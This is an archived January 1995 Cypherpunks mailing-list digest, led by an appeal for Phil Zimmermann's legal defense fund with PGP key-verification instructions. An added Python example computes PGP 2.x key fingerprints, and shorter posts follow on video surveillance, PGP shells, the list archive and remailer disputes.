> costs, personal and professional, to him have been great.  He wrote the
> original code for PGP 1.0 by sacrificing months of valuable time from
> his consulting career and exhausting his savings.  He continues to
> devote large amounts of his time to testifying before Congress, doing
> public speaking engagements around the world, and agitating for
> "cryptography for the masses," largely at his own expense.  He is now
> working, still for free, on the next step in PGP technology, PGP Phone,
> which will turn every PC with a sound card and a modem into a secure
> telephone.  And we know that, just last month, he was searched and
> interrogated in the absence of counsel by US Customs officials upon his
> return from a speaking tour in Europe.
> 
>     Phil's legal team consists of his lead counsel, Philip Dubois of
> Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in
> Washington, DC, first counsel for intelligence policy for the Justice
> Department under President Carter; Eben Moglen, professor of law at
> Columbia and Harvard Universities; Curt Karnow, a former assistant US
> attorney and intellectual property law specialist at Landels, Ripley &
> Diamond in San Francisco; and Thomas Nolan, noted criminal defense
> attorney in Menlo Park.
> 
>     While this is a stellar legal team, what makes it even more
> extraordinary is that several of its members have given their time for
> free to Phil's case.  Still, while their time has been donated so far,
> other expenses -- travel, lodging, telephone, and other costs -- have
> fallen to Phil.  If the indictment is handed down, time and costs will
> soar, and the members of the team currently working pro bono may no
> longer be able to.  Justice does not come cheap in this country, but
> Phil deserves the best justice money can buy him.
> 
>     This is where you and I come in.  Phil Dubois estimates that the
> costs of the case, leaving aside the lawyers' fees, will run from
> US$100,000 - $150,000.  If Phil's team must charge for their services,
> the total cost of the litigation may range as high as US$300,000.  The
> legal defense fund is already several thousand dollars in the red and
> the airline tickets to San Jose haven't even been purchased yet.
> 
>     In September, 1993 I wrote a letter urging us all to support Phil,
> shortly after the first subpoenas were issued by Customs.  Today the
> need is greater than ever, and I'm repeating the call.
> 
>     Phil has assumed the burden and risk of being the first to develop
> truly effective tools with which we all might secure our communications
> against prying eyes, in a political environment increasingly hostile to
> such an idea -- an environment in which Clipper chips and digital
> telephony bills are our own government's answer to our concerns.  Now
> is the time for us all to step forward and help shoulder that burden
> with him.
> 
>     It is time more than ever.  I call on all of us, both here in the
> US and abroad, to help defend Phil and perhaps establish a
> groundbreaking legal precedent.  PGP now has an installed base of
> hundreds of thousands of users.  PGP works.  It must -- no other
> "crypto" package, of the hundreds available on the Internet and BBS's
> worldwide, has ever been subjected to the governmental attention PGP
> has.  How much is PGP worth to you?  How much is the complete security
> of your thoughts, writings, ideas, communications, your life's work,
> worth to you?  The price of a retail application package?  Send it.
> More?  Send it.  Whatever you can spare: send it.
> 
>     A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has
> been established with Phil Dubois in Boulder.  Donations will be
> accepted in any reliable form, check, money order, or wire transfer,
> and in any currency, as well as by credit card.
> 
>     You may give anonymously or not, but PLEASE - give generously.  If
> you admire PGP, what it was intended to do and the ideals which
> animated its creation, express your support with a contribution to this
> fund.
> 
>                            *    *    *
> 
>     Here are the details:
> 
>     To send a check or money order by mail, make it payable, NOT to Phil
> Zimmermann, but to "Philip L. Dubois, Attorney Trust Account."  Mail the
> check or money order to the following address:
> 
>     Philip Dubois
>     2305 Broadway
>     Boulder, CO USA 80304
>     (Phone #: 303-444-3885)
> 
>     To send a wire transfer, your bank will need the following
> information:
> 
>     Bank: VectraBank
>     Routing #: 107004365
>     Account #: 0113830
>     Account Name: "Philip L. Dubois, Attorney Trust Account"
> 
>     Now here's the neat bit.  You can make a donation to the PZDF by
> Internet mail on your VISA or MasterCard.  Worried about snoopers
> intercepting your e-mail?  Don't worry -- use PGP.
> 
>     Simply compose a message in plain ASCII text giving the following:
> the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank
> name of your VISA or MasterCard; the name which appears on it; a
> telephone number at which you can be reached in case of problems; the
> card number; date of expiry; and, most important, the amount you wish
> to donate.  (Make this last item as large as possible.) Then use PGP to
> encrypt and ASCII-armor the message using Phil Dubois's public key,
> enclosed below.  (You can also sign the message if you like.)  E-mail
> the output file to Phil Dubois (dubois@csn.org). Please be sure to use
> a "Subject:" line reading something like "Phil Zimmermann Defense Fund"
> so he'll know to decrypt it right away.
> 
> 	Bona fides: My relation to Phil Z. is that of a long-time user and
> advocate of PGP and a personal friend. For over a year I moderated the
> (no longer published) digest, Info-PGP, on the old lucpul.it.luc.edu site
> here at Loyola. I am in no way involved with the administration of the
> PZDF. I volunteer my time on its behalf.
> 	Phil Dubois is Phil Z.'s lawyer and lead counsel in the Customs case.
> He administers the PZDF.
> 	To obtain a copy of my public key (with which you can verify the
> signature on this doc), you have a number of options:
> 	- Use the copy which I will append below.
> 	- Send mail to me at hmiller@luc.edu with the "Subject:" line
> reading "send pubkey"
> 	- Get it by anon ftp at ftp://ftp.math.luc.edu/pub/hmiller/pubkey.hm
> 	- Obtain it from an Internet PGP keyserver machine such as
> pgp-public-keys@pgp.ai.mit.edu. Just send a mail message to this
> address with the "Subject:" field "GET hmiller". Other keyserver
> machines on the Net which accept the same message format (and
> automatically synchronize keyrings with each other every 10 minutes or
> so) include:
> 
> 		pgp-public-keys@pgp.mit.edu
> 		pgp-public-keys@demon.co.uk
> 		pgp-public-keys@pgp.ox.ac.uk
> 		pgp-public-keys@ext221.sra.co.jp
> 		pgp-public-keys@kub.nl
> 		pgp-public-keys@pgp.iastate.edu
> 		pgp-public-keys@dsi.unimi.it
> 		pgp-public-keys@pgp.dhp.com
> 
> 	You can verify my public key by calling me at 312-338-2689 (home)
> or 312-508-2727 (office) and letting me read you my key fingerprint
> ("pgp -kvc hmiller" after you have put my key on your pubring.pgp keyring).
> I include it also in my .sig, below, if that's good enough for you.
> 	You might also note that Phil Zimmermann has signed my public key.
> Hopefully he is Node #1 in your Web-of-Trust! His key is available on
> the net keyservers and in the 'keys.asc' file in the PGP distribution
> packages.
> 	Phil Dubois's pubkey can also be obtained from the keyservers, if
> you prefer that source to the text below, and from 'keys.asc'. Phil Z.
> has signed his key as well.
> 
>     Here is Phil Dubois's public key:
> 
> 
> Here is my (Hugh Miller's) public key:
> 
> 
>                            *    *    *
> 
>     This campaign letter will be posted in a number of Usenet groups.
> I will also be turning it into a FAQ-formatted document, which will be
> posted monthly in the relevant groups and which will be available by
> anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ.  If
> you come upon, or up with, any other ways in which we can help raise funds
> for Phil, drop me a line at hmiller@luc.edu and let me know, so that I
> can put it in the FAQ.
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLvFO3tEdYC5Hk8UpAQF6IwQAp3Ig71gGRj/dDGXDBdqj55uMQQsywhi2
> pEzh0arfrRonqMX0UleysqYqjcUtm0rvbrXoYUy8a9vJzj4Wuyf1dQ6WyqBkcmOX
> z7RGtoLVxsfTjNNTrY0810SXx/yOMYtBW7mq+zNmqEykGFZTdfsVKFEyFw6AJ//B
> Ah+LQNb01Xo=
> =aW2m
> -----END PGP SIGNATURE-----
> 
> 
> 
> --
> Hugh Miller, Ph.D.                                     Voice: 312-508-2727
> Asst. Professor of Philosophy                            FAX: 312-508-2292
> Loyola University Chicago                               Home: 312-338-2689
> 6525 N. Sheridan Rd.                               E-mail: hmiller@luc.edu
> Chicago, IL 60626                         WWW: http://www.luc.edu/~hmiller
> PGP Public Key 4793C529:  FC D2 08 BB 0C 6D CB C8  0B F9 BA 55 62 19 40 21

--
Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM
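
Added example (not part of the archived messages and not PGP's own code): what the
fingerprint check described in the appeal above ("pgp -kvc hmiller", then comparing
with the value read over the phone) computes for a PGP 2.x RSA key, following the
version 3 key rules in RFC 4880. The sample key bytes and all function names are
constructed for illustration.

```python
import base64
import hashlib
import struct

# Constructed sample values (assumption): made-up bytes, not a real RSA key.
SAMPLE_N = bytes([0xC3]) + bytes(range(1, 60)) + bytes.fromhex("DEADBEEF")
SAMPLE_E = b"\x11"

CRC24_INIT, CRC24_POLY = 0xB704CE, 0x1864CFB


def crc24(data: bytes) -> int:
    """CRC-24 carried on the '=XXXX' line at the end of ASCII armor."""
    crc = CRC24_INIT
    for byte in data:
        crc ^= byte << 16
        for _ in range(8):
            crc <<= 1
            if crc & 0x1000000:
                crc ^= CRC24_POLY
    return crc & 0xFFFFFF


def dearmor(text: str) -> bytes:
    """Return the binary packets of one armored block after checking its CRC."""
    # Tolerate "> " mail quoting and the "- " dash-escaping of clear-signed text.
    lines = [ln.strip().lstrip("> ").strip() for ln in text.strip().splitlines()]
    lines = [ln[2:] if ln.startswith("- -----") else ln for ln in lines]
    start = next(i for i, ln in enumerate(lines) if ln.startswith("-----BEGIN PGP"))
    end = next(i for i, ln in enumerate(lines) if ln.startswith("-----END PGP"))
    body = lines[start + 1:end]
    i = 0
    while i < len(body) and ":" in body[i]:   # armor headers such as "Version:"
        i += 1
    body = [ln for ln in body[i:] if ln]
    checksum = None
    if body and body[-1].startswith("="):
        checksum = int.from_bytes(base64.b64decode(body.pop()[1:]), "big")
    data = base64.b64decode("".join(body))
    if checksum is not None and crc24(data) != checksum:
        raise ValueError("armor CRC-24 mismatch: block altered or truncated")
    return data


def read_mpi(buf: bytes, pos: int):
    """Read one multiprecision integer: 2-byte bit count, then the value bytes."""
    (bits,) = struct.unpack_from(">H", buf, pos)
    nbytes = (bits + 7) // 8
    value = buf[pos + 2:pos + 2 + nbytes]
    if len(value) != nbytes:
        raise ValueError("truncated MPI")
    return value, pos + 2 + nbytes


def parse_rsa_v3_key(packets: bytes):
    """Extract the (n, e) byte strings from a leading v2/v3 RSA public-key packet."""
    if not packets:
        raise ValueError("empty key block")
    ctb = packets[0]
    # Old-format header byte is 10ttttll; tag 6 is a public-key packet.
    if ctb & 0xC0 != 0x80 or (ctb >> 2) & 0x0F != 6 or ctb & 0x03 == 3:
        raise ValueError("not an old-format public-key packet")
    len_size = 1 << (ctb & 0x03)
    length = int.from_bytes(packets[1:1 + len_size], "big")
    body = packets[1 + len_size:1 + len_size + length]
    if len(body) != length:
        raise ValueError("truncated packet")
    version, _created, _valid_days, algo = struct.unpack_from(">BIHB", body, 0)
    if version not in (2, 3) or algo != 1:
        raise ValueError("not a version 2/3 RSA key")
    n, pos = read_mpi(body, 8)
    e, _ = read_mpi(body, pos)
    return n, e


def v3_fingerprint(n: bytes, e: bytes) -> str:
    """MD5 over the n bytes then the e bytes, shown as 16 hex pairs."""
    digest = hashlib.md5(n + e).hexdigest().upper()
    return " ".join(digest[i:i + 2] for i in range(0, 32, 2))


def key_id32(n: bytes) -> str:
    """Short key ID: the low 32 bits of the modulus."""
    return n[-4:].hex().upper()


def fingerprints_match(computed: str, heard: str) -> bool:
    """Compare two fingerprints, ignoring spacing and letter case."""
    return "".join(computed.split()).upper() == "".join(heard.split()).upper()


def build_sample_armor(n: bytes, e: bytes) -> str:
    """Constructed input: armor a v3 public-key packet around the given bytes."""
    def mpi(v):
        return struct.pack(">H", int.from_bytes(v, "big").bit_length()) + v
    body = struct.pack(">BIHB", 3, 0, 0, 1) + mpi(n) + mpi(e)
    packet = bytes([0x99]) + struct.pack(">H", len(body)) + body
    b64 = base64.b64encode(packet).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    crc = base64.b64encode(crc24(packet).to_bytes(3, "big")).decode()
    return "\n".join(["-----BEGIN PGP PUBLIC KEY BLOCK-----", "Version: 2.6.2", "",
                      *lines, "=" + crc, "-----END PGP PUBLIC KEY BLOCK-----"])


if __name__ == "__main__":
    n, e = parse_rsa_v3_key(dearmor(build_sample_armor(SAMPLE_N, SAMPLE_E)))
    print("key ID", key_id32(n), "fingerprint", v3_fingerprint(n, e))
```

The armor CRC only catches accidental damage; the out-of-band fingerprint comparison is the actual authenticity check. RFC 4880 notes that this fingerprint hashes the key material but not its length, one of the reasons version 3 keys were later deprecated.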


                 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 00:15:04 PST
To: Cypherpunks@toad.com
Subject: The first reply came 3 days later.
Message-ID: <Pine.3.89.9501070243.B14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



These groups are important to me. It is why I posted them there. I use
PGP extensively in my usenet postings, and I am not the only one in those
groups that posts with PGP. Yes, suffice to say, I endorse this letter.
I dream of a day when we do not have to deal with this issue, yet it is
something that affects anyone who uses the program. All that was really
asked was not to go to the meeting with the D.A., and make a protest.
MOST CYPHERPUNKS I KNOW OF COULDN'T HAVE MADE IT ANYWAY, THIS TIME, BECAUSE
THE STAKES IN THE REMAILER GAME ARE HIGH, AND WITHIN A MONTH OR TWO, THERE
WILL BE A SYSTEM SO THAT WE CAN GET SOME MONEY TO EAT WITH AND BUY EQUIPMENT.
But on the user level, I do my best to TEACH GOOD FUNDAMENTAL COMPUTER
SAFETY. Rumors are no good for this. There was PRZ's letter to us, and
Dubois's letter to alt.security.pgp. Those are facts. Those I can teach
with, and so can even a one month PGP Cypherpunk Novice. So can you.

Now, the first reply,




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Fri, 6 Jan 95 17:26:41 PST
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199501062336.PAA12592@homer.spry.com>
Message-ID: <199501070127.AA00746@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



> Think I'll go make some popcorn and sit back to watch the fireworks some more.

(giggle) (giggle) 
(giggle) (giggle) 

Me, too. 

Love always,

Carole Anne Buttock

P.S. Someone with a clue: please help me get a life. Only 10
     cross posts!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nissim@acs.bu.edu
Date: Fri, 6 Jan 95 23:55:20 PST
To: cypherpunks@toad.com
Subject: what to do about live video - all the time?
Message-ID: <199501070745.CAA64839@acs.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've just invented a big hassle, and if I don't start the patent 
process someone else will.

Picture a near future in which your shirt or walkman is a 360 degree video 
camera sensing live video across visible and other spectra.  Your shirt
sends out a signal to your home computer.  Your home computer archives your
daily environment and activities for you.

You have been sold this device on several premises.

	1) crime reduction - no sane low level criminal would harass
	   you; you have him, his biometrics, unique thermal signature
	   etc. on video.  Talk about neighborhood watch.

	2) life/work productivity enhancement.  What was said when?
	   what could you have looked into today but slipped your mind?

	3) warm fuzzies.  Kodak style "your life in pictures."


For now I'll assume the device actually works as claimed.  It is 
affordably priced.  Any normal person who has a car alarm, walkman,
or laptop PC is apt to have one.  You even get a small discount on your
health insurance.  Maybe your local taxes go down as your district
votes to reduce the # of cops.

For now, we assume that all the output of your video shirt
is securely encrypted when it leaves the Vshirt.

	
	ISSUE 1:  Who controls the data?

Year 0:  The devices are so rare the police don't think to ask
	 people to supply their tapes if they witness a crime 
	 committed re: a third party.  

Year 3:	 The police subpoena Vshirts they know to be in the
	 crime vicinity.  Presumably they use their current
	 abilities with cellphone companies to locate who's where when.

Year 3.1 While reviewing Vshirt tapes police note that non-case
	 related illegal activities are going on.  Jaywalking.
	 Speeding.  Recreational drugs.  Verbal assault. Life and
	 property threatening felonies are also discovered.

At this point the scene bifurcates wildly:  Do the police say,
"look, this is happening anyway, we need 24 hour video surveillance
of everything - if nothing else to protect ourselves in court."

	Evidence: in the UK they video the motorways, and several
	public areas in the cities (soc.culture.british Jan '95)
	-for crime/security purposes.

	In the US, there are utility poles wired for sound. Design News
	had an item on this in their Yellow newsflash section in '93
	I think.  The utility poles were/are in Washington DC, and 
	supposedly only listen for gunshots.  I'm pretty sure the poles 
	could call the cops in using triangulated crime location data too.

However slight the infraction, we are all lawbreakers.  Do we have a 
right to "not testify against ourselves" by refusing to decrypt?  Can we 
buy (ugh.) an "attorney-client privilege" box that holds all of our data Keys
in a legal fiction that the courts currently respect?  Will the 5th fare 
any better than the 1st and second amendments?

Will the state issue a "statute of limitations" on data-recorded
crime, so that you can't be arrested for last year's public drunkenness?

Will Vshirt makers make, or be allowed to make, devices that create
-absolutely no residue- data keys?  that way, if you want to
protect yourself from what you happened last thursday you can set the
keystrip on fire and nobody, not even you, has a hope of ever decrypting?

	Evidence: in the US Digital audio tape Mfrs. are required to
	put in some sort of copyguard. Also scanners w/image signature.

	In the US, reconstructed deleted files for legal purposes is
	considered legal evidence.  There is a firm in Seattle that
	has even reconstructed harddisks written over with 0s
	for criminal (tax) cases.
	
	Citizens or their employers are required to keep and prepare 
	documentation adequate to prepare a valid tax return. i.e., 
	some records you _have_ to keep.

	and of course the digital telephony bill... 
	

What thoughtful Pro-freedom arguments can be constructed to deal with 
this device and its social fallout?  What thoughtful software and hardware
can be created?

The device does not yet exist, but component parts can be assembled for
less than $2000 and 17oz weight that do a fair job of mimicking it.

	Moore's "law" suggests that by 2000, these oughta be
	$19.99/month plus data charges.

VoicePGP is a great jumping-off place...will there be a VideoPGP,
or rather an optimized-for-videoPGP coming soon?  If I've
christened its existence now.  I hereby declare the application of 
Public+private key cryptography as it especially applies to picture, live 
picture, and/or video transmission to be public domain.   
(Surely I'm not the first, but this can't hurt.)

Write.  Talk.  Create.  Protect yourselves.


ObLameJoke:					   
Well, as far as I know none of my relatives were killed by Stalin, or Mao, 
or interned in WWII, or blacklisted, or even jailed.  I suppose a few 
were drafted.  I guess it's about time for the forces of authority to 
reach into my little corner of the gene pool and crush me too.  I mean, 
I'm missing out!  


Treon Verdery, posting under the auspices of Adam Almog




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 00:56:30 PST
To: Cypherpunks@toad.com
Subject: I haven't read this response, until now!
Message-ID: <Pine.3.89.9501070201.C14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear All,

I haven't seen the next two responses, yet they comprise all the 
responses that ten news groups had made as of this posting, in my
newsreader here at MM.COM. I am told there are now more, yet I think
it's kind of a moot point (david@winternet.com was the reporter).

So I am going to import the text now and read it finally.
I have read the text, and I giggle a little, at who sent it.

Now you already have had the advantage of seeing copy by Mr. Horwath.
Mr. Logajan didn't. And didn't for a number of days. Nor did anyone
else either.
[teacher mode on]

LOOK AT THE GROUPS MR. LOGAJAN IS RESPONDING TO. HE IS ONLY REPLYING TO
ONE, NOT TEN GROUPS. AND, EITHER HE OR MR. HAS CENSORED NINE OTHER GROUPS
FROM THEIR RIGHTFUL REPLIES. I DO BELIEVE, WHEN YOU LOOK AT MR. HORWATH'S
PRIOR POSTING, I THINK YOU WILL FIND THAT HE DID TAMPER WITH THE POSTING.
AND, WHAT YOU GET AS A LESSON HERE IS JUST WHY THE REMAILER PROGRAM IS IN
TROUBLE. THERE JUST HAS TO BE PLAIN AND SIMPLE TRUST. MR. LOGAJAN IS UNDER
THAT SIMPLE DELUSION, FOR THE MOMENT. YET AS CYPHERPUNKS, THERE IS A KIND
OF AN UNSTATED UNDERSTANDING THAT WE DO NOT DO THIS TO OTHERS OR OURSELVES.

[teacher mode off]

Mr. Horwath at least owes Mr. Logajan an apology. For misrepresentation.

Mr. Horwath owes nine newsgroups an apology. For telling them (through 
omission) that mn.general is more important than they are. 
It was about this point I was on the list again. 
The damage was done, and now repairs were under way. 

Now, the third and last response I know of, to this point.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 7 Jan 95 02:12:51 PST
To: RopeGun@calvino.alaska.net
Subject: Re: pgp shells for windows....
In-Reply-To: <Chameleon.950107014244.RopeGun@RopeGun.alaska.net>
Message-ID: <m0rQY9E-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> I've read the pgp docs and several other unofficial documents on pgp and I have come to the conclusion
> that a shell for pgp is the most sensible approach using such a powerful encryption program.  I've
> searched to the best of my abilities and have found several pgp shells for windows, but all of them seem to
> assume that the user has an above average understanding of the workings of pgp and all of its uses.  At
> this point you're probably thinking that I'm looking for an easy way to get around learning pgp the hard way,
> but I'm not...   the whole idea of pgp is that privacy and security be available to anyone, using any platform.
> But ease of use was not really one of the features built into pgp.  If anyone can refer me to a windows
> shell for pgp (for dummies :-)   ) I would like to get a copy of it for distribution on the bulletin board nets...

Which ones have you looked at?
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Sat, 7 Jan 95 02:32:20 PST
To: RopeGun@calvino.alaska.net
Subject: Re: pgp shells for windows....
In-Reply-To: <Chameleon.950107020459.RopeGun@RopeGun.alaska.net>
Message-ID: <m0rQYRy-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> winpgp2.6 was the most successful pgp shell I could find but the interface
> was stale and nondescript.  including the fact that when it executed the
> commands it opened a window and I was interfacing with the dos pgp
> interface, I found that a little redundant for a shell program; but then
> again I'm not sure if an interface with pgp can be done any other way. 

Try ftp.netcom.com:/pub/ec/ecarp/pgpwind.zip - you might find it a bit more
to your liking.  There are others out there, and their authors will probably
speak up :)
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager

Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

"What's the use of distant travel if only to discover - you're homeless in
your heart."  --Basia, "Yearning"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Sat, 7 Jan 95 03:36:04 PST
To: tengi@Princeton.EDU (Christopher J. Tengi)
Subject: Re: Indexing and searching
In-Reply-To: <9501062315.AA29835@deepthought.Princeton.EDU>
Message-ID: <199501071134.DAA17942@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    We sure need some indexing and searching to use the archive.
    A directory command at ftp.hks.net:/cypherpunks/nntp/cypherpunks 
    gets you 8200+ lines of:
    ...
    -rw-r--r--  1 8        8           34609 Sep 24 20:02 3255
    -rw-r--r--  1 8        8            1154 Sep 24 20:24 3256
    -rw-r--r--  1 8        8            1443 Sep 25 03:15 3257
    -rw-r--r--  1 8        8            1675 Sep 25 03:33 3258
    -rw-r--r--  1 8        8            1634 Sep 25 10:35 3259
    -rw-r--r--  1 8        8            3243 Jul 21 23:59 326
    -rw-r--r--  1 8        8             955 Sep 25 11:41 3260
    -rw-r--r--  1 8        8            2088 Sep 25 12:05 3261
    -rw-r--r--  1 8        8            3930 Sep 25 12:06 3262
    ...

    Why, it's virtually encrypted!  How fitting.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@mm.com>
Date: Sat, 7 Jan 95 01:42:30 PST
To: Cypherpunks@toad.com
Subject: Nope, the Skypoint Newsreader didn't carry any of the 9 groups.
Message-ID: <Pine.3.89.9501070359.D14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear All,

And, amazingly neither does MM.Com. And if I'm going to infer, I'd better go
back and look at the facts on hand. No, Mr. Horwath's reader has up to
4,500 or so groups in it at any given moment. Here at MM.Com we only have
1,009 to be precise. So let us remind ourselves that this didn't even get
"full" coverage in a lot of places. And, in some maybe none at all.

So stay tuned, as the story of the anonymous remailer cartel works its
way into place. I have a chain.exe script in the winternet.files. Spose
I could go net.rad and go get another from soda.berkeley or somewhere.
Look remailers, meet somewhere face to face, shake hands, hug each other,
cut a deal eyeball to eyeball, just do the best you can with what you've got.

So remailer cartel 1.0 has a bug or two. So does all humanity. Even so did
my logic for a minute or two (only). So go somewhere fun and sort it out.
And write what wonderful "vacations" you're having, as you all will be MAKING
MONEY FAST, within hours after your glorious return to civilization.

(even money says the anon server bounces this to somebody)

And as I stated four postings ago.

No Mr. Ste. Marie only ten, and as we saw in some cases only one.
not hundreds or thousands, just a few. .1% One One Tenth of a Percent.
And, one instance of One One Hundredth of a Percent. About as bad as
the pentium bug story. And that's still an acceptable post in any group.

Somebody uses PGP in any of those groups. They are my friends.
I hope I can learn remailer procedure and code soon, it looks fun.

Thanks for your time.

Love Always,

Carol Anne




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 03:27:52 PST
To: "I'm Wozz" <wozzeck@phantom.com>
Subject: Big vs Little providers (punkette view)
In-Reply-To: <Pine.3.89.9501061945.A12905-0100000@mindvox>
Message-ID: <Pine.3.89.9501070420.H14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Perspective, Perspective, Perspective.

You're both right on many counts.

Mike is a "fine benevolent dictator". He has many "happy" users.
He has now five local Usenet groups of winternet.*

But he reneges on deals. The shirts were ready before Thanksgiving.
He possesses them as I write. He violates the spirit by which
I processed their making (the samples).

Many orders for the shirts were made prior to Thanksgiving, I still have the
mail for them at squeaky.free.org (good storage place).

Then there's the GT story. I organized one for them. Created a sked for 
more of them. He didn't like the sked. The Users did.

There was an incident of much greater magnitude, that drew far less
attention. It was my call for WWW crosspost linkages. It was hand
posted to 75 or so groups, one at a time. The plus minus ratio of
mail was last at 412 positive, and 8 negative. Squeaky has half the
mail. There's 50 and growing crossposts that are drawing 200+ 
accesses a day to that page. Any other page he has on his system 
is only drawing 40-50 responses at best. I have copies of the
daily access statistics /usr/local/ect/httpd/stats/summary

If my mail is frozen, so too should all phases of that account, including
the WWW Pages. Besides, maybe they "have violated acceptable use policy", too!
That's just sound administrative policy to shut everything down.

You haven't heard about Webbittown, yet. Bruce Sterling owns #9 Blackice 
Blvd. It's a Web page city of 20,000 individual pages, at a $1,000 a page.
Just like Real Estate. Run by doom software drivers.

Mike's poor vision is another T1 line, maybe two if he's lucky.
They are hacking his machine like crazy, he claims.
That means you got some serious enemies, if it's true.
That means you don't abuse your fans like me, at a time like that.
It also probably means one of his "friends" is his enemy.

I have an alt.dream.lucid of having the world's best web server.
I dream of people being able to protect their HTML code with PGP.
Functional on top, crypto underneath. Encryption on the fly.

This was something that was bound to happen sooner or later.
Better sooner than later. Now there's precedent. 10 groups,
and the reply's caught in the pine processor 3.91, too!

Doc Ozone says pine 3.91's full of leaks. Doc Ozone and I make 
machines for people who are 'netless'. It's called the tired,
poor project. Give us your tired, your poor, your old PC's.

Miles, a seven year old is next on the list. We gave Mike a 
Sparc monitor from one of our equipment forays. Free, zip, zilch
for we got for free zip zilch. He begged for it. It was still
sitting in the office Wednesday, unfixed for anyone.

I equate the thing to a domestic abuse situation. As long as it's
minor, as long as it's hushed, it's OK. Even this would have been
OK if it had stayed silent. There is a safety in numbers factor.
AOL proves it. And as they descend upon the net things will
change again.

The moment I called little tiny Micro Net, I knew there would be
fallout. I will not respond to the actual posting unless I'm asked
a direct question about the substance of the post. But it's
pretty self explanatory, and I cry to think there's a real bitch.

Yes, at Netcom, I can now probably get much further, much faster.
No I wouldn't subject myself or anyone to Winternet. But I wouldn't
subject a newbie to Netcom either. I did it once and was sorry, too.

I'm just a punk girl who writes great HTML code. And I hope that
it can be protected by cryptography, that's my little goal.

I hope I have both made you think and feel you are right,
because both of you are, in certain kinds of ways. And you know it, too.

Now where was I?, oh yeah, Is there like a Remailer for Dummies,
quick reference manual? I could have fun learning & doing that.

Till My Next Mini-Rant,

Love Always,

Carol Anne



Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Sat, 7 Jan 95 04:40:49 PST
To: "L. Todd Masco" <cactus@seabsd.hks.net>
Subject: Re: Files and mail
In-Reply-To: <199501070607.BAA04310@bb.hks.net>
Message-ID: <Pine.3.89.9501070624.J14788-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


You should paint this as a canvas, and sell it for five big digits.
This post right here, in all its mono glory, is real art.

On Sat, 7 Jan 1995, L. Todd Masco wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> - -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> Anybody want to offer odds on whether or not this merry little exchange
> will be reported in Wired as news?
> - - --
> Todd Masco     | "life without caution/ the only worth living / love for a man/
> cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage
> - - --
> Todd Masco     | "life without caution/ the only worth living / love for a man/
> cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
> Cactus' Homepage
> 
> - -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLw301xNhgovrPB7dAQFj3gP8CJV4TyRUl+sEQRHX6qH2TKK+B+JKLrwk
> kUM7Y0yaY2ZwScBnYRva5/Pyu8r70i2Z3yQUQFF7ECasxHwrYftfWweD0/4Pc4ws
> qEGNfGIheHtnP/J0B7G7xsIyAMSZIlUD3RCQ49o4BOpWk6bev4t5i/RP10yK9sit
> dA1go4Jiaag=
> =eQPF
> - -----END PGP SIGNATURE-----
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBLw4vqSoZzwIn1bdtAQER/QF/SkRQGEEjHn+E0SZEiWs0McAvRccuzxFQ
